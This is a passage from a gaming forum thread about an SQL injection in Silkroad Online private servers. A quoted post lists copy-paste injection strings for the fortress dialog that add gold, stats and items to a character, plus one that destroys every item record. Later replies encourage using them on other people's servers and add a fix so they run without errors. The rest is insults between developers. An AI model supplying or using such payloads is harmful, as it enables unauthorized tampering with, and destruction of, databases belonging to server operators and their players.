[INFORMATION] SQL Injection (ingame)

Page 2 of 6 1 2 34 Last »
09/06/2016 18:39 ​Goofie​#16
Quote:
Originally Posted by tschulian View Post
btw Goofie, have you ever heared about logical operators?
[Only registered and activated users can see links. Click Here To Register...]
I do not store all opcodes in my new source.

Also you are using recoded k-Guard? are you fucking kidding me?
09/06/2016 21:22 bissag#17
is there a way to fix it with gameserver debug edit?
09/06/2016 21:46 ​Goofie​#18
Quote:
Originally Posted by bissag View Post
is there a way to fix it with gameserver debug edit?
After packet is sent Client => Server the GameServer runs the SQL query, unless you break the entire query and stop them from updating the information in GameServer I believe not.

Shouldn't be hard to find it in GameServer do, but then again, nobody can update the information which is bad? I'm not sure what it really does for the guilds.
09/06/2016 22:33 too.different.boy#19
Quote:
Originally Posted by Tazdingo7 View Post
Credits for the pic (? xD

Some funny sql injections you can do without any error at gameserver:

1. Add Gold to your character
a'; UPDATE _Char SET RemainGold = 99999999999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a

2. Add more stats to your character
a'; UPDATE _Char SET RemainStatPoint = 99999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a

3. If you know the item codes, why not create some of them?
a'; exec _ADD_ITEM_EXTERN 'Charname','ITEM_EU_TSWORD_11_SET_A_RARE',0,20; UPDATE _SiegeFortress SET Introduction = 'a

If you want to fuck off the database(dont do it if you are not the server admin, ok no):
a'; UPDATE _Items SET RefItemID = 0; UPDATE _SiegeFortress SET Introduction = 'a

Just copy & paste this injections to the fortress dialog.

Have fun.
So it really works? I play on some private server and wanna try it. Tired of making new char and getting good set in a loop after months because of the death of p-server. Wanna be good once.
09/06/2016 22:49 rares495#20
Quote:
Originally Posted by ​Goofie​ View Post
After packet is sent Client => Server the GameServer runs the SQL query, unless you break the entire query and stop them from updating the information in GameServer I believe not.

Shouldn't be hard to find it in GameServer do, but then again, nobody can update the information which is bad? I'm not sure what it really does for the guilds.
EDIT: I'm an idiot nvm.
09/07/2016 10:14 tschulian#21
Quote:
Originally Posted by ​Goofie​ View Post
I do not store all opcodes in my new source.


Also you are using recoded k-Guard? are you fucking kidding me?
I havent talked about how opcodes are stored. :D:D:D:D lol that guy is blended af.


:D:D way better features and stability than your crap? ur supershit is recoded aswell and you are blaming me o.O haha funniest guy ever.
I love Internetkinder like you :)

Quote:
Originally Posted by too.different.boy View Post
So it really works? I play on some private server and wanna try it. Tired of making new char and getting good set in a loop after months because of the death of p-server. Wanna be good once.
Dont forget to add the -- at the end of each line. otherwise an error will appear.
09/07/2016 14:04 gaspaHHH#22
Does this work in any other dialogue box in Silkroad ?
09/07/2016 21:58 Spartacus-Vic#23
very sick injection
09/08/2016 00:59 Anonymous-9238#24
Behold, another war of who has the bigger dick.

Fucking stop it already, it's been 10 years.
09/08/2016 01:29 Syloxx#25
Quote:
Originally Posted by Simulation1337 View Post
Behold, another war of who has the bigger dick.

Fucking stop it already, it's been 10 years.
[Only registered and activated users can see links. Click Here To Register...]

Greetings to @[Only registered and activated users can see links. Click Here To Register...] ;D
09/08/2016 03:01 EdwardTeach+-#26
Quote:
Originally Posted by gaspaHHH View Post
Does this work in any other dialogue box in Silkroad ?
+1
09/09/2016 03:22 ​Goofie​#27
Quote:
Originally Posted by tschulian View Post
:D:D way better features and stability than your crap? ur supershit is recoded aswell and you are blaming me o.O haha funniest guy ever.
I love Internetkinder like you :)
Ok, anytime u want give me ip:port for ur filter.
Bigdicks clan approves this ^.
09/10/2016 01:22 links2007#28
What about ?

PHP Code:
use SRO_VT_SHARD_INIT 

update _SiegeFortress set IntroductionModificationPermission 
09/10/2016 02:20 CarolineForbes#29
Don't stop the war guys, keep on flaming each other. Was such a fun read yesterday :c
It's not nice to take credit from some1 else Syloxx :/ Dam bad boy ..
09/10/2016 06:11 LogLoft420#30
what about guild notice and msg box? tried that but doesn't work probably my ending line is wrong hmm
and @[Only registered and activated users can see links. Click Here To Register...] :D that qoute was good in the season finale xD
Page 2 of 6 1 2 34 Last »